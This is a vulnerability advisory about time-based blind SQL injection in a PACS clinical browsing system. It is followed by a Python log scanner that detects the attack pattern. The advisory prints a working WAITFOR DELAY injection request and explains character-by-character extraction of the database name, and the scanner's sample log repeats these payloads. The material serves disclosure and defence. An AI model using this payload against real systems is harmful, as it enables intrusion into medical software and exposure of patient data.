There is a front-end SQL injection vulnerability in the clinical browsing system of Lanwang Technology Co., Ltd.
- Affected product: PACS clinical browsing system
- Vulnerable endpoint: /xds/cloudInterface.php
3. Vulnerability reproduction
The login interface is as shown in the figure.
Because the SQL injection here is a time-based blind injection, the database name has to be recovered one character at a time by comparing ASCII values (a 5-second delay means the guess was correct). The POC is as follows.
Here, the substring comparison shows that the first character of the database name is X:
GET /xds/cloudInterface.php?INSTI_CODE=1%27);if%20(ascii(substring(db_name(),1,1)))=88%20WAITFOR%20DELAY%20%270:0:5%27--%20q HTTP/1.1
Host: ip:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=9ppbslm6ue630ge9ptrdprb0d2
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 192.168.1.23
Here, the substring comparison shows that the second character of the database name is D.
Here, the substring comparison shows that the third character of the database name is S.
Here, the substring comparison shows that the fourth character of the database name is 7.
Here, the substring comparison shows that the fifth character of the database name is 0.
Here, the substring comparison shows that the sixth character of the database name is T.
Putting the six positions together, the delay-based injection confirms that the database name is XDS70T.
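As an added defensive example (not part of the original report), the following Python scans access-log lines for the request shape shown above: a time-delay primitive (WAITFOR DELAY and similar) combined with an ascii(substring(db_name(),N,1)) probe, which is the signature of this character-by-character blind extraction. The log lines, timestamps and client addresses are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original report); the first two
# mirror the request shape the advisory shows against /xds/cloudInterface.php.
SAMPLE_LOG = """\
192.168.1.23 - - [01/Jan/2024:10:00:00 +0000] "GET /xds/cloudInterface.php?INSTI_CODE=1%27);if%20(ascii(substring(db_name(),1,1)))=88%20WAITFOR%20DELAY%20%270:0:5%27--%20q HTTP/1.1" 200 512
192.168.1.23 - - [01/Jan/2024:10:00:06 +0000] "GET /xds/cloudInterface.php?INSTI_CODE=1%27);if%20(ascii(substring(db_name(),2,1)))=68%20WAITFOR%20DELAY%20%270:0:5%27--%20q HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:01:00 +0000] "GET /xds/cloudInterface.php?INSTI_CODE=HOSP01 HTTP/1.1" 200 2048
"""

# Common log format: client, identity, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Indicators: a delay primitive, and a character-extraction probe on the database name.
TIME_DELAY_RE = re.compile(r"waitfor\s+delay|sleep\s*\(|pg_sleep\s*\(|benchmark\s*\(", re.I)
CHAR_PROBE_RE = re.compile(r"ascii\s*\(\s*substring\s*\(", re.I)
PROBE_POS_RE = re.compile(r"substring\s*\(\s*db_name\s*\(\s*\)\s*,\s*(\d+)\s*,\s*1\s*\)[\s)]*=\s*(\d+)", re.I)

def decode_target(target):
    """URL-decode repeatedly so double-encoded payloads are also visible to the checks."""
    prev = None
    while prev != target:
        prev, target = target, unquote_plus(target)
    return target

def analyze_line(line):
    """Return a finding dict for a suspicious request, or None for a benign/unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode_target(m.group("target"))
    tags = []
    if TIME_DELAY_RE.search(target):
        tags.append("time_delay")
    if CHAR_PROBE_RE.search(target):
        tags.append("char_probe")
    if not tags:
        return None
    finding = {"ip": m.group("ip"), "path": target.split("?", 1)[0], "tags": tags}
    pos = PROBE_POS_RE.search(target)
    if pos:  # record which position of db_name() was probed and the character being tested
        finding["probe"] = (int(pos.group(1)), chr(int(pos.group(2))))
    return finding

def scan_log(text):
    return [f for f in (analyze_line(ln) for ln in text.splitlines()) if f]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

Requests from one client that step the probe position upward over time are the enumeration itself; alerting on the pair of indicators rather than on either alone keeps the rule from firing on ordinary queries that happen to contain a substring call.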